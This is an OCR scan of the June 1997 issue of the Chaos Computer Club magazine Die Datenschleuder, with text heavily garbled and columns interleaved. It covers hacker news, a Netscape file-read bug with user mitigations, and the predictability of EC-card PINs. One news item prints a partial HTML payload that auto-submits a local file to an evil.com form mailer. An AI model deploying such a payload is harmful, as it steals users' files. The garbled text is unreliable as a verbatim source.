Sie sind auf Seite 1von 32

Die Datenschleuder

Das wissenschaftliche Fachblatt für Datenreisende


Ein Organ des Chaos Computer Club

Ein Sicherheitsproblem bei ihrer EC-Karte


ist aufgetreten.

Geben Sie die Karte ihrer Bank zurück.

Gehen Sie nicht über Los.

Ziehen sie keine Klage wegen Betrugs und


Vortäuschung einer Straftat ein.

■ Aktenzeichen EC ungelöst
■ Neues von der Kryptofront
■ Internetz endlich verboten !
O M
D -R
e C
n
it oh
t m
etz
ISSN 0930-1045 ! J
e u
Juni 1997, DM 5,00 N
Postvertriebsstück C11301F #59
Impressum Adressen
Die Datenschleuder Nr. 59
Quartal I, Juni 1997 siehe auch http://www.ccc.de & de.org.ccc

Herausgeber: Hamburg: Treff jeden Dienstag, 20 Uhr in den ClubrŠumen in der


(Abo«s, AdressŠnderungen etc.) Schwenckestr. 85 oder im griechischen Restaurant gegenŸber. U-Bahn
Chaos Computer Club e.V. Osterstrasse / Tel. (040) 401801-0, Fax (040) 4917689, Mail: ccchh@ccc.de
Schwenckestrasse 85 Berlin: Treff jeden Dienstag ca. 20 Uhr in den ClubrŠumen, Neue
D-20255 Hamburg Schšnhauser Str. 20, Vorderhaus ganz oben. S-/U-Alexanderplatz, S-
Tel. 040-401801-0 /Fax. 040-4917689 Hackescher Markt oder U-Weinmeisterstr. Tel. (030) 28354870, Fax (030)
Mail: ofÞce@ccchh.ccc.de 28354878, Mail: cccbln@ccc.de. Briefpost: CCC Berlin, Postfach 642 860,
D-10048 Berlin Chaosradio auf Fritz i.d.R. am letzten Mittwoch im
Redaktion: Monat von 22.00-01.00 Uhr.
(Artikel, Leserbriefe etc.)
Redaktion Datenschleuder Sachsen/Leipzig: Treffen jeden Dienstag ab 19 Uhr im CafŽ Ambiente,
Postfach 642 860 Petersteinweg, NŠhe Neues Rathaus/Hauptpolizeiwache. Veranstaltun-
D-10048 Berlin gen werden p. Mail Ÿber d. Sachsen-Verteiler (Uni-Leipz) angekŸndigt.
Tel. 030-28354872/Fax. 030-28354878 Infos f. Neueinsteiger gibt«s von bubble@sachsen.ccc.de /Briefpost:
(Tel Šndert sich vorr. demnŠchst) Virtueller CCC-Sachsen, c/o Frohburger Medienhaus, Leipziger Str. 3,
Mail: ds@ccc.de 04654 Frohburg, Tel: (034348)51153, Fax (034348)51024, Mail:
sachsen@ccc.de, http://www.sachsen.ccc.de
Druck: St. Pauli Druckerei Hamburg Kšln: Ab 1. Juli Treff jeden Dienstag um 19:30 bei Abgang! in der
HŠndelstrasse 19. Telefonischer Kontakt via 0177-2605262.
ViSdP: Andy MŸller-Maguhn
Mšnchengladbach: Treff: Surfers Paradise, Bahner 19 in Mšnchenglad-
bach vorerst einmal im Monat jeden letzten Freitag, Ab 1. August dann
Mitarbeiter dieser Ausgabe:
immer Dienstags um 20 Uhr. Mail: gregor@enconet.de
Andreas, Bishop (bishop@ccc.de),
Andy (andy@ccc.de), Wau Holland Bielefeld: FoeBud e.V., Treff jeden Dienstag um 19:30 im Cafe Durst in
(wau@ccc.de), Tim Pritlove der Heeperstr. 64. Monatliche ãPublic DomainÒ Veranstaltung, siehe
(tim@ccc.de), Christine Schšnfeld, Mailbox. Briefpost: Foebud e.V., Marktstr. 18, D-33602 Bielefeld, Fax.
Silke, Tobias (tobias@ccc.de), (0521) 61172, Mailbox (0521) 68000 und Telefon-Hotline Mo-Fr 17-19
Zapf Dingbats Uhr (0521) 175254. Mail zentrale@bionic.zerberus.de
Eigentumsvorbehalt: LŸbeck: Treff am ersten und dritten Freitag im Monat um 19 Uhr im
Diese Zeitschrift ist solange ãShortyÕsÒ, Kronsforder Allee 3a. mail: ccc@ews.on-luebeck.de,
Eigentum des Absenders, bis sie http://www.on-lŸbeck.de/bÞscher/ccc.html, Briefpost: CCC-HL c/o
dem Gefangenen persšnlich Benno Fischer, Bugenhagenstr. 7, D-23568 LŸbeck. Tel. (0451) 3882220,
ausgehŠndigt worden ist. Zur-Habe- Fax. (0451) 3882221
Nahme ist keine persšnliche
Ulm: Treff jeden Montag um 19 Uhr im Cafe Einstein an der Uni Ulm.
AushŠndigung im Sinne des
Kontakt: frank.kargl@rz.uni-ulm.de
Vorbehalts. Wird die Zeitschrift dem
Gefangenen nicht ausgehŠndigt, so Stuttgart: Computerunde SŸcrates, Mail norman@delos.stgt.sub.org
ist sie dem Absender mit dem Frankfurt/Mainz: kriegen sich noch nicht zusammengerauft. Wird das
Grund der NichtaushŠndigung in bald mal was?!
Form eines rechtsmittelfŠhigen
Bescheides zurŸckzusenden. …sterreich: Engagierte ComputerexpertInnen,
Copyright (C) bei den Autoren Postfach 168, A-1015 Wien
Abdruck fŸr nichtgewerbliche
Zwecke bei Quellenangabe erlaubt. USA: 2600 siehe http://www.2600.com

Die Datenschleuder
Nummer 59, Juni 1997
Editorial

Wir Diskordier müssen auseinanderhalten...


Liebe Datenschleuder Leser,
das Prinzip der DezentralitŠt und DiskordinitŠt (und leider auch der DiskoordinitŠt ;-)
begleitet diesen Computer Club jetzt schon seit mehr als ein Jahrzehnt. Die Dynamik des
Lebens, gekoppelt mit der Erfrischung der WiedersprŸche und Šhnlichen Zutaten waren
bislang ein mehr oder weniger gutes Rezept das Chaos aufrechtzuerhalten.
Ob wir allerdings mit der wachsenden Relevanz unserer Themen (z.B. diese blšden
Computer & ihre Auswirkungen auf das menschliche Leben) unsere DiskoordinitŠt auch bei-
behalten sollten, steht momentan mal wieder zur diskordischen Diskussion.
Professionalisierung als Gebot der Stunde? MachtŸbernahme? Forschungszentrum fŸr kyber-
netische Hebelermittlung? Stiftung fŸr hochbegabte aber sozial extraterristisch orientierte
Jugendliche? Lobbyarbeit? Partei grŸnden? Genossenschaft aller CCC nahen Firmen?
Bundesregierung wegprogrammieren? Internet endlich als Land bei der UN anmelden und
dahin ziehen?
Informationsfreiheit ist leicht gesagt und schwer verwirklicht. Unser Layouter z.B. hat sich
von der letzten Datenschleuder noch nicht erholt und vor Fertigstellung dieser erstmal die
Flucht ergriffen und sich in den Urlaub abgesetzt. Der fŸr Beschreibung derartiger
Sachverhalte zustŠndige Redakteur fŸr die Katastrophenberichterstattung wurde das letzte
mal beim packen seines Wohnmobils gesehen. Und das Resultat von alldem?
Haltet ihr in den HŠnden.
Trotzdem gibt es hoffnungsvolle AnsŠtze, mit dem Chaos bald die Welt zu regieren. Kritiker
behaupten, wir wŸrden das lŠngst tun. Effektivere Ma§nahmen ergreift in diesem Sinne
jedoch eher die Bundesregierung: erlŠ§t ãMultimediaÒ- Gesetze die eigentlich alles unklare
wie z.B. Verantwortlichkeiten regeln sollen, in erster Linie aber deutlich dokumentieren, da§
die Verantwortlichen das Internet gar nicht begriffen haben und in der Konsequenz ein
Riesen-Chaos anrichten. In diesem Sinne gibt es viel zu tun. Lasst uns bloss wegfahrn. Nach
Holland zum Beispiel (siehe Seite 31).
rŠt,
eure Stimme aus dem Chaos

Index 9
11
- EC-Karten Unsicherheit
- Gutachten von Prof. Pausch zum EC-PIN
21 - Algorithmus zur Generierung der PIN
3 - G10 Statistik inofÞziel veršffentlicht
22 - OVst-Watch: Beobachtungen am T-Netz
- Europ. IN-provider ham Schnauze voll
23 - Gesetze gegen Code-Knacker geplant
4 - Biologische KriegsfŸhrung: USA vs. Kuba
- Bundestag zur Lage der IT-Sicherheit
- Masterspy Turned out Schoolboy Hacker
24 - DES noch nicht tot, stinkt aber schon
5 - Sex-StraftŠter am Internet-Pranger
- USA: KontrolleinschrŠnkungssimulation
- Hackers hit Polish prime minister
26 - ...It doesn«t change things at all
- Japan:Hacker replaced weather with Porn
- PGP darf exportiert werden
6 - Netscape Security Flaw is a feature
- Alert: Senate to vote on...key escrow
- Netscape Exploit
27 - RSA/CRT: One strike and you«re out!
7 - Netscape privacy problem reduced
28 - SET auch durch
- NT Insecurity
29 - Das Allerletzte...
8 - Absolution fŸr Ladendiebe
30 - Termine / HOPE II / HIP«97 / CCC-MV
- Pay per view execution?
31 - Bestellfetzen

Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen
Deutschland France Telecom and British Telecom. EuNet
1996 soviele Telefone abgehört wie has already Þled one complaint last month,
against BelgiumÕs national carrier Belgacom.
niemals zuvor Outside the EU, the company has won a case
against Swiss PTT over unfair subsidies to its
Das Bundeskriminalamt und die Bundesan- own online service, Helsingius said.
waltschaft haben im vergangenen Jahr soviele ãBelgacom has shown discriminatory practice
Telefone abhšren lassen wie nie zuvor. toward us on almost everything, including
Demnach wurden insgesamt 4674 fest delaying on deliverables without
installierte AnschlŸsse mit richterlicher explanation,Ò Helsingius said at a European
Genehmigung angezapft. chief executivesÕ conference organized by the
Wall Street Journal here. ãThereÕs no decision
Das seien 27,5 Prozent mehr als im Vorjahr yet, because the commission is still
gewesen. Auch die Zahl der Ÿberwachten investigating the case.Ò
Funk-Telefone erreichte mit 1929 abgehšrten
MobilanschlŸssen Rekordhšhe. Die The EC regulates competition in the 15
Abhšraktionen kosteten insgesamt weit mehr countries of the European Union. ãBut that
als eine Million Mark. [the complaint against Belgacom] is just a
AFP/Bild 15.05.1997 pilot,Ò Helsingius added. ãWe have a box full
of other complaints against incumbent opera-
tors in Germany, the United Kingdom and
Europa France. In Germany, Deutsche Telekom is so
Internet Provider Takes On Top strong in the market that they just dominate.Ò
EuNet International, which runs its own
European Carriers Internet backbone but needs to interconnect
One of EuropeÕs leading independent Internet with local networks, is also unhappy with its
service providers is to launch anti-trust treatment from Dutch operator PTT
actions against the European UnionÕs top Nederland, Helsingius said, but he added:
three telecommunications carriers. ãThey are not the worst offendersÒ EC
competition ofÞcials declined to conÞrm
EuNet International, a Dutch-based ISP, said whether the commission will launch a full
Tuesday it is set to launch a slate of investigation over the Belgacom case.
complaints to the European Commission over
alleged dirty tricks including abuse of ãWe are doing our duty, and Belgacom knows
dominant market position and unexplained us very well,Ò said one senior competition
delays to services promised to EuNet Ñ by ofÞcial, who could not be quoted by name.
top EU telecom carriers attempting to protect Complaints against European national
their online service business against the inde- telephone companies by ISPs and by
pendent ISPs. independent telecom carriers are expected to
EuNet International product development increase during the next six months, as the
director Johan Helsingius said his company EU prepares for the liberalization of telecom
will Þle complaints to the European markets in January 1998.
Commission against Deutsche Telekom, But though the European telecom services

Die Datenschleuder
Nummer 59, Juni 1997
Chaos Realitäts Abgleich
market is supposed to be open to competition Internet
by January next year, the EC has yet to work
out how it will treat Net-based services Ñ
Masterspy Turned Out to be
such as Internet telephony Ñ which compete Schoolboy Hacker
LONDON - A masterspy believed by the
directly with traditional carriers. The EC said Pentagon to be the No. 1threat to U.S.
in May it was setting up a special unit to deal security and deadlier
with complaints of anti- than the KGB turned
competitive behavior in out to be a British
the run-up to liberalizati- schoolboy hacker wor-
on of the telecom king out of his
market. bedroom. U.S. military
Peter Chapman, Techwire chiefs feared that an
06.04.1997 East European spy
(Johan Helsingius aka Julf ring had gained access
war Ÿber lange Jahre to their innermost
hinweg der Betreiber von intelligence secrets
anon.penet.Þ) and hacked into
American Air Defense
Planet Erde systems.
Biologische Kriegsführung: But a 13-month investigation and a dramatic
Kuba beschuldigt USA police raid on his London home revealed that
16-year-old music student Richard Pryce was
the culprit. Pryce, known on the internet as
Laut CNN-Web vom 15.5.1997 sehen sich ãThe Datastream Cowboy,Ò was Þned $1,915
kubanische Farmer derzeit mit einem Friday by a London court after what his
Problem konfrontiert, das sie bislang nur mit lawyer called ãa schoolboy prankÒ reminiscent
der Lupe erkennen kšnnen: ihre Ernte wird of the movie ãWar Games.Ò The U.S. Senate
durch einen winzigen SchŠdling namens armed services committee was told the
ãThryps palmiÒ bedroht. SŠmtliche Pestizide mystery hacker was the number one threat to
haben sich als ineffektiv erwiesen. Das Insekt U.S. security. He was said to have downloaded
hat bereits einen erheblichen Teil der kuba- dozens of secret Þles, including details of the
nischen GemŸseernte (Kohl, Tomaten, research and development of ballistic missiles.
Gurken, Bohnen) befallen, so da§ massive Up to 200 security breaches were logged.
Preisanstiege zu erwarten sind, wenn die Using a $1,200 computer and modem, Pryce
Insektenplage anhŠlt. hacked into computers at GrifÞss Air Base in
Die kubanische Regierung wirft den USA bio- New York and a network in California run by
logische KriegsfŸhrung vor. Ein US-Flugzeug the missile and aircraft manufacturer
soll den SchŠdling im letzten Oktober Ÿber Lockheed. ãThose places were a lot easier to
Kuba ausgesetzt haben. Washington get into than university computers in
dementiert. England,Ò Pryce told reporters. ãIt was more
of a challenge really, going somewhere I was-
Die Meldung war einen halben Tag auf dem CNN-
nÕt meant to. If you set out to go somewhere
Server und verschwand dann...
and you get there, other hackers would be

Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen
impressed,Ò he said. His prank put Pryce on altering its heading to read ãHackpublic of
the front pages of most British newspapers PolandÒ and ãGovernment Disinformation
Saturday with tales of ãThe Schoolboy Center,Ò a newspaper reported Wednesday.
masterspyÒ and ãThe Boy who cracked open Internet users seeking information from the
the Pentagon.Ò prime ministerÕs ofÞce found themselves
Pryce, now 19, has been offered sizeable sums referred to the site of Playboy magazine by
for the book and Þlm rights to his story but the unknown hacker, who signed him or
his parents say he prefers to stick to his herself ãDamage.Inc,Ò the daily Gazeta
double bass and concentrate on winning a Wyborcza said. An ofÞcial in the ofÞce which
place in a leading London orchestra. produced the government website told
Reuters Wednesday it had been withdrawn
ãQuite remarkably in a society dominated by pending the provision of new security
sleaze, he has refused all the offers and wants codes.A copy of the altered version could still
xto resume his quiet life,Ò said his father, be viewed on
Nick Robertson. His computer skills were not http://www.software.com.pl/intdev/news/
reßected in his exam results Ñ he was only welcomep.html, the server of the Net Security
awarded a ÔDÕ grade. Institute (IBS) in Warsaw. The newspaper
Reuter 22.03.1997 quoted government spokeswoman
Aleksandra Jakubowska as saying that the
Internet cabinet website was not connected to the
governmentÕs internal computer network so
Sex-Straftäter am Internet-Pranger there was no danger of using the internet to
Seattle - Sex-StraftŠter stehen im US-Bundes- access government secrets.
staat Alaska nach ihrer Haftentlassung am
elektronischen Pranger. Wer wegen Reuter 07.05.1997
Vergewaltigung, Kindesmi§brauch oder
Verbreitung von Pornographie verurteilt wur- Internet
de, wird mit Namen und Adresse auf einer
neuen Webseite angegeben. Sie sei ein voller Japan police say hacker replaced
Erfolg, sagte die Polizei in Anchorage. In den weather with porn
ersten 24 Stunden seit ihrer Einrichtung sei
sie fast 4000 mal angewŠhlt worden. Wie in TOKYO, (23.05.1997/Reuter) - Japanese
vielen anderen US-Bundesstaaten sollten die police on Friday arrested a 27-year-old
BŸrger durch die Veršffentlichung wissen, computer engineer suspected of replacing
wer in ihrer Mitte wohne. public weather charts on the Internet with
dpa 13.06.1997 pornographic pictures. A spokesman for
Osaka police said Koichi Kubojima, a resident
Internet of the northern Tokyo suburb of Fujimi, was
Hackers hit Polish prime minister’s the Þrst person in Japan to be arrested for
suspected violation of a 1987 anti-hacker law.
website Kubojima is accused of taking over seven
web pages of the Osaka-based television
WARSAW - A hacker broke into the Polish network Asahi Broadcasting Company on
cabinetÕs internet website over the weekend, May 18 and replacing Þve of the seven

Die Datenschleuder
Nummer 59, Juni 1997
Chaos Realitäts Abgleich
weather charts on the pages with According to Netscape spokesmen, this
pornographic pictures. He also faces charges feature was added to the kernel of Mosaic,
under JapanÕs anti-obscenity laws. Police said then Navigator, in 1993, as part of the Clipper
Kubojima told investigators he was just Key Recovery Program. As James Clarke put
trying to have some fun and tried but failed it an interview tonight on MSNBC, ãDorothy
to delete the pictures when he learned that Denning asked us to insert the ãremote readÒ
his own actions were being reported all over capabilities to ensure that the legitimate
on the Internet. He used a fake password needs of law enforcement are met. No person
obtained from a local Internet provider to ent- cruising the Web has any expectation of
er the website from his personal computer at privacy, as even Declan McCullagh has
home, but his operations were retraced by pointed out.Ò Marc Rotenberg commented,
investigators through phone records kept at ãPrivacy at the individual user level is
the provider Þrm, police said. If convicted, unimportant, just so long as a Privacy
Kubojima faces a Þne of one million yen Ombudsman can decide on the legitimate
($8,600) and a prison term of up to Þve years needs of law enforcement.Ò
under tough penalties against hackers
adopted in 1992. Meanwhile, Microsoft has acknowledge that
all lines to its Redmond site are clogged by
Bugs people dumping Navigator and trying to
download Explorer.
Netscape Security Flaw is a feature
Many of us have been watching the CNN ÑTim May, tcmay@got.net
reportsÑheadline reports at thatÑthat all
past and current versions of Netscape on all Netscape Exploit
platforms have reportedly carried the bug Here is a sample it isnÕt complete but you get
that allows any Web site being hit by the basic idea of what is going on
Netscape to examine Þles on the userÕs hard
disk. <HTML><HEAD><TITLE>Evil-DOT-COM
Homepage</TITLE><HEAD>
(A demonstration by the Danish team was <BODY onLoad=ÒdaForm.submit()Ò>
compelling. CNN-FN generated a text Þle,
<FORM>
placed it on their hard disk, and accessed the
Danish site. Moments later, the Danes read NAME=ÒdaFormÒ
back the text Þle. Over and over for more ACTION=Òhttp://evil.com/cgi-
examples. They _could have been_ the NSA bin/formmail.plÒ
Web site, and the Þles could have been METHOD=POST
history Þles, passphrase Þles, etc. History Þles
<INPUT TYPE=FILE VALUE=Òc:\conÞg.sysÒ
are common, and give captured kestrokes, of Name=ÒSave This Document on your
course.) HarddriveÒ
<INPUT TYPE=HIDDEN NAME=ÒrecipientÒ
But how could such a massive, massive ßaw value=Òfoobar@evil.comÒ
have gone undiscovered for so long?
and so on and so forth...
The answer, ãItÕs a feature, not a bug.Ò Lucky Green <shamrock@netcom.com>

Die Datenschleuder
Nummer 59, Juni 1997
Kurzmeldungen

...Bugs... whenever a site tries to upload a form, giving


the user a chance to decide whether to allow
Netscape privacy problem reproduced it.

Using information gleaned from the web site * Also, in Navigator 3.x and 2.x, go to the
of the Danish company that Þrst reported the Options menu and select Network
problem, Keith Woodard and Dave Preferences. Turn OFF the ãEnable
Humphrey at EIFIST have built a web page JavaScriptÒ preference. This will block
which reproduces the privacy problem in execution of JavaScript code which might try
Netscape Navigator and Communicator web to perform an invisible Þle upload, while per-
browsers. From that effort they have mitting display of the rest of the page.These
developed a better understanding of how the measures are temporary until a full bug Þx is
Netscape bug works, and what defensive made available by Netscape and proven
measures users can take until a bugÞx is avai- against the EIFIST demo page.
lable from Netscape. First, the problem is
indeed read-only, and involves only Þles to Regards
which the explicit path name
is known. Second, all Þle NT Insecurity
systems accessible from the In order to expose the
Netscape userÕs system are ßaw and demonstrate
reachable Ñ that means these potential vulne
mapped network drives as well abilities,NTsecurity.com
as the local hard disk. Third, created a program tool
JavaScript can be used by a called RedButton. When
web site to automate reading a executed, RedButton
userÕs Þle so that it is invisible exploits the ßaw and
to the user. However, the bug does the following: - logs
does not involve use of Java at on remotely to a Target
all. computer without presenting any User Name
and Password- gains access to the resources
The demo website can be visited at the published to Everyone - determines the
following URL: current name of Built-in Administrator
account (thus demonstrating that it is useless
http://eiÞst.frb.org/hacker/Þleupload.html to rename it) - reads several registry entries
(i.e. it displays the name of Registered
Please urge all Internet web users to take the Owner) - lists all shares (including the hidden
following interim steps until a permanent Þx ones) RedButton is not an intruderÕs tool, and
is available from Netscape: it does not increase any security risks or
vulnerability. However, it demonstrates how
* In Navigator 3.x and 2.x, go to the Options a potential intruder can exploit an NT system.
menu and select Security Preferences. Select
the ãSubmitting a Form InsecurelyÒ preferen- http://www.ntsecurity.com/RedButton/index.htm
ce to enable that warning dialog box. This
will generate a warning box

Die Datenschleuder
Nummer 59, Juni 1997
Chaos Realitäts Abgleich

Evolution victims. To make an execution public like in the case


of Tim McVeigh, would be like returning to the 15th
Absolution für Ladendiebe century. Arguably, in the case of Oklahoma City bom-
SupermŠrkte seien wie KrebsgeschwŸre fŸr bing, the victims were random Americans, and by
das soziale Leben in den StŠdten, meint der extension each resident of the U.S. can be considered
anglikanische Geistliche their relative,
John Papworth. Deshalb proponents of the
sei Ladendiebstahl televised execution
keine SŸnde. Die Kirche may say. However,
von England reagierte public was never in
ebenso ungehalten wie the entire history
Supermarktketten und CHARGED to view
der britische an execution. How
Innenminister. Doch many people would
Papworth lŠ§t sich nicht actually pay to watch
beirren: Jesus habe zwar NŠchstenliebe gepre- Timothy die? Imagine after a day of hard work, you
digt, er habe aber nicht gesagt: ãDu sollst relax on your couch, pop up a beer can and order a
Marks und Spencer liebenÒ, sagte der nice pay-per-view execution. Watch him die in privacy
Geistliche in Anspielung eine britische and convenience of your own apartment. How much
Supermarktkette. should it cost? How much would people be willing to
pay? Should the victims and their relatives be paid
Quelle: CriminalDigest 2/97 royalties - I mean, their suffering brought down the
sentence and the execution, but they did not actively
De-Evolution participate in the business. Will cable companies let
them watch execution for free, or at some discount at
Pay per view execution? least? Bizarre as it is - introduction of pay-per-view
In the U.S. Timothy McVeigh might get a pay-per-view executions may reduce the backlog on the death row:
execution prime time In middle ages executions were now, when there is money to be made, maybe there
popular spectacles: it was a way for powerful (nobles, will be state licensed lethal injection private
kings, church, etc.) to show their power in most practitioners (Kevorkian, as a person with immense
ßagrant way to the peasants and just ordinary plebs. It experience, should apply), and the process of ãdeliver-
was also a way for the public to participate in the ing justiceÒ may speed up considerably.
punishment of the perceived evil - whether it was a
real Jeffrey Dahmer like psycho, or a woman accused http://www.peacenet.org/balkans/
for witchcraft. Watching the criminal die for his/hers # Ursprung : /APC/GEN/RADIO
crimes or sins works cathartic on people. It also ## Ersteller: ivo@reporters.net
reinforces the public belief in justice, order and the sta- PO Box 46, NYC NY 10029, USA
te. Only later in our development as humans did we
decide that an execution is actually a state sponsored
murder, and no murder is justiÞed under the rule of
God, so, therefore, while many governments did not
dispense off death penalty, they usually restrained
themselves from televising executions and instead sho-
wing them just to the close range of relatives of

Die Datenschleuder
Nummer 59, Juni 1997
EC-Karten Unsicherheit
Bereits in der Datenschleuder Nummer 53 im Pausch-Gutachten seine (!) SerišsitŠt
Dezember 1995 wurde der Leser in einem anzweifelten. Unter dem Motto: ãnicht mal
einen lŠngeren Artikel Ÿber die Verbraucher- die haben es geschafft, die Informationen zu
schutz-Problematik der EC-Karte aufgeklŠrt. bekommen...Ò.
Im Kern besteht das Problem in der sog.
ãSorgfaltspßichtÒ des Kunden zum Umgang Diese Details und etliche andere kamen
mit dem PIN-Code, welcher zu seiner EC- jedoch erst in den letzten Wochen zum Vor-
Karte gehšrt. schein, nachdem ein spektakulŠres Gerichts-
urteil des OLG Hamm am 17.03.1997
Der Kunde ist verpßichtet, diesen PIN-Code Bewegung in die Sache brachte. Unter dem
niemandem mitzuteilen, ihn nicht zusammen Aktenzeichen 31 U 72 / 96 und der - leider
mit der Karte aufzubewahren, ihn nicht auf erst Mitte Mai verfŸgbaren UrteilsbegrŸn-
die EC-Karte selbst zu schreiben und so fort. dung (2) - wurde nicht nur auf Oberlandes-
Wird nun jemand seine EC-Karte z.B. mit sei- gerichtsebene in einem nicht-revisionsfŠhigen
nem kompletten Portemonaie geklaut und es Urteil die Ermittelbarkeit aufgrund der
kommt, bevor er die Karte Ÿber den zentralen Kartendaten bestŠtigt, sondern auch gleich
Sperrdienst in Frankfurt sperrt, zu Abhebun- die Beweislastfrage auf die fallspeziÞschen
gen, hat er ein Problem. Konkret muss er Randhandlungen bezogen. Ausschlaggebend
seiner Bank beweisen, da§ er seiner Sorgfalts- war wiederum ein Gutachten des Prof. Dr.
pßicht nachgekommen ist, also seinem Pausch, der allerdings diesmal wesentlich
geklauten Portemonaie kein Zettel mit seinem ausfŸhrlicher die ihm bekannten Mšglichkei-
PIN-Code beilag. Die Banken argumentierten ten aufzeigte, wie ein Dieb den PIN-Code
bisher mit der Unmšglichkeit, von den Daten ermitteln kšnne.
des Magnetstreifens auf den PIN-Code zu
kommen. Sie verdŠchtigen standartmŠssig im Das nachstehend (mit freundlicher Genehmi-
Gegensatz den Kunden, den Diebstahl der gung von Prof. Dr. Pausch) abgedruckte
Karte nur vorgetŠuscht zu haben und die Gutachten spricht fŸr sich und bringt
Abhebungen selbst getŠtigt zu haben, bzw. deutliche Beleuchtung in den Sachverhalt.
als MittŠter diese mitgeteilt zu haben. Die Feststellung, da§ die Mšglichkeit des
Auch wenn der Algorithmus und die Erratens des PIN-Codes mit einer
Vorgehensweise, wie aus den Kartendaten Wahrscheinlichkeit von 1:150 aufgrund un-
der PIN berechnet wird schon lŠnger bekannt gleichmŠssiger Verteilung anderer Details
ist, gelang der Beweis der Berechnung bisher mšglich ist, wurde beim OLG-Hamm sogar
eher nicht und Gerichtsverfahren gingen von Herrn Dr. Heuser vom Bundesamt fŸr
entsprechend verbraucherungŸnstig aus. Sicherheit in der Informationstechnik (BSI)
bestŠtigt.
Lediglich in einem Gerichtsverfahren von
1988 (AZ 36C4386/87) in denen Prof. Dr. Herr Dr. Heuser versprach Ÿbrigens einem
Pausch in einem Gutachten ermittelte, das Mitarbeiter der Datenschleuder zwar die
der PIN-Code sehr wohl unter bestimmten umgehende Zusendung seines Gutachtens,
Vorraussetzungen ermittelbar war, bekam die dies erreichte uns jedoch auch nach 4 Wochen
betroffene Kundin recht. In der Datenschleu- nicht. Mittlerweile sind von mehreren unab-
der 53 versprach ich damals mehr Ÿber das hŠngigen Quellen Hinweise auf die Motive
Gutachten von Pausch und das Urteil in des BSI aufgetaucht, nach 15 (!) Jahren die
Erfahrung zu bringen, was aufgrund akuten lŠngst bekannte Unsicherheit des EC-
Chaos auf anderen Baustellen (CCC«95 und Kartenverfahrens teilweise einzugestehen.
Folgen) unterblieb. Dies ist insofern im nach- Das BSI, so hei§t es, arbeitet an einer chip-
hinein wichtig, als das der DS-Artikel in meh- kartenbasierten Lšsung fŸr rechtsverbind-
reren Gerichtsverfahren als Beweismaterial liche elektronische Unterschriften (Authen-
eingereicht wurde und die Banken dann mit tiÞzierung) nach der jŸngst verabschiedeten
Verweis auf den versprochenen aber Signaturgesetzgebung des Multimedia-
fehlenden Folgeartikel mit den Details vom Gesetzes aus dem Hause RŸttgers (BMBF).
WŠre ja auch komisch, wenn sich das

Die Datenschleuder
Nummer 59, Juni 1997
AZ 31 U 72 / 96 und folgen
staatliche BSI sich uneigennŸtzig gegen die Datenbestand bekannt, sondern auch
Banken wenden wŸrde... weiterhin (ofßine) GAA im (europŠischen)
Ausland; auch berichtete Pausch auf der ãa«la
Doch zurŸck zur Unsicherheit des EC- CardÒ Konferenz in Hamburg von einem Fall
Systems. Die Wahrscheinlichkeitsaussage von einer westdeutschen Gro§stadt im Mai
beruht auf der Art und Weise der internen 1997, wo ein Bagger versehentlich die
Umrechnung und einer Besonderheit. Die Kabelverbindungen eines GAA wegri§ und
Besonderheit ist, dass die erste Ziffer der PIN dieser trotzdem noch ec-Karten akzeptierte
niemals eine 0 ist, tritt eine 0 im Rechen- und bei richtigem PIN Geld ausspuckte.
proze§ als Ergebnis aus wird daraus eine 1 Bankenvertreter rŠumten auf selbiger
gemacht. Die Art und Weise der Umrechnung Konferenz in der Diskussion Ÿbrigens ein,
ist die Umwandlung der internen Hex-Werte man kšnne ja auch nicht im Ofßine-Fall
(0-9 & A-F) auf Dezimalziffern (0-9): aus ãA- einfach die Auszahlung verweigern; man
FÒ wird wiederum ã0-5Ò nach Modulo 10: stelle sich den Kunden im Ausland vor, der
A=0, B=1 etc. - und aus A=0 wird bei der auf einmal kein Bargeld bekommt oder im
ersten Ziffer wiederum aus 0 eine 1 weil die 0 Restaurant sein Essen nicht bezahlen kann...
per DeÞnition hier nicht erlaubt ist. So treten
an 1. Stelle die Ziffern 0,1,A,B vier mal so Eine richtige Sachinformation enthŠlt die
hŠuÞg auf wie andere, die Ziffern 1-5 ZKA-Stellungnahme dann Ÿbrigens doch
insgesamt bei den anderen Stellen jedoch noch: ãDarŸber hinaus werden alle VerfŸgungen
doppelt so hŠuÞg auf wie die anderen. Damit und VerfŸhrungsversuche mit falscher PIN proto-
treten bestimmte PIN«s hŠuÞger auf als ande- kolliert, so da§ Angriffe, die auf einem
re (Errechnungen dem Leser vorbehalten). Ausprobieren von PIN beruhen, nachvollzogen
und eindeutig erkannt werden kšnnen.Ò (die
Frage ist nur wo, wann und durch wen!)
Reaktionen sowie die Folgerung (wenn man sich die
Die Banken konzentrieren sich in ihrer EinschrŠnkung hinzudenkt, dass dies nur
Reaktion derweil auf Nebelwerfen und beim online-Betrieb Ÿberhaupt sein kann),
Mauern - nebst Umstellung auf ein neues da§ ãAuch eine VerŠnderung des
PIN-Verfahren. Das betroffene Institut des FehlbedienungszŠhlers auf der Karte fŸhrt daher
OLG-Hamm Urteils, die Postbank, verwei- nicht zu einer beliebig hohen Zahl von PIN-
gert z.B. eine eigene Stellungnahme (3) und Versuchen.Ò.
verweist auf den Zentralen Kreditausschu§ Ganz zufŠllig, všllig unabhŠngig von diesen
(ZKA). Dieser wiederum versucht mit Geschehnissen und in Ÿberhaupt keinem
nebulšsen Angaben die UrteilsbegrŸndung Zusammenhang stehend (;-) verkŸndet uns
und den Gutachter zu diskreditieren. ein Artikel in der FAZ vom 27.05.1997, dann
So behauptet der ZKA (4) beispielsweise, da§ noch dieses Jahr alle ec-Karten eine neue
ã[...] Viele Karten verfŸgen Ÿber gar keine PIN zugewiesen bekommen. Auf dem Weg
gŸltigen Offset-Werte mehr, da diese Werte fŸr zur Abschaffung des 56-bit PoolschlŸssels
die †berprŸfung der PIN heute nicht mehr und ofßine-GAA hin zu 128-Bit Instituts-
benštigt werden. Der angenommene schlŸsseln und der Mšglichkeit, seinen PIN
Wahrscheinlichkeitswert fŸr ein Erraten der PIN selbst zu Šndern gibt es zwei Schritte.
ist daher nicht zutreffend.Ò. Implizit wird ZunŠchst erhalten die ec-Karten Kunden eine
(aufgrund des Zwecks des Offsets; der Offset neue PIN mitgeteilt, die zum Tag X gilt. Dann
ist der (Zahlen-)wert, der dem Rechenergebnis im zweiten Schritt (ca. 1998) kann der Kunde
des PoolschlŸssels hinzugefŸgt wird, wenn die (neue) PIN selbst Šndern (auf 4-12
